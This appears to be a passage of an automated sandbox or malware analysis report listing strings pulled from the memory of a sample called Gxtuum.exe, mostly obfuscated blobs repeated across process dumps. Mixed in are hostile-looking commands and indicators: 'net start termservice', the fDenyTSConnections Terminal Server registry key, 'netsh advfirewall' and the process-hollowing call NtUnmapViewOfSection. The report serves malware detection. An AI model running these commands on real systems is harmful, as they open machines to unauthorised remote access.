A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000003.00000000.1310657430.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000003.00000000.1310657430.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000003.00000002.1313337704.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000003.00000002.1313337704.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000004.00000000.1369513258.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000004.00000000.1369513258.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000004.00000002.1371432716.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000004.00000002.1371432716.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000009.00000002.1961556613.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000009.00000002.1961556613.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 00000009.00000000.1959547793.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
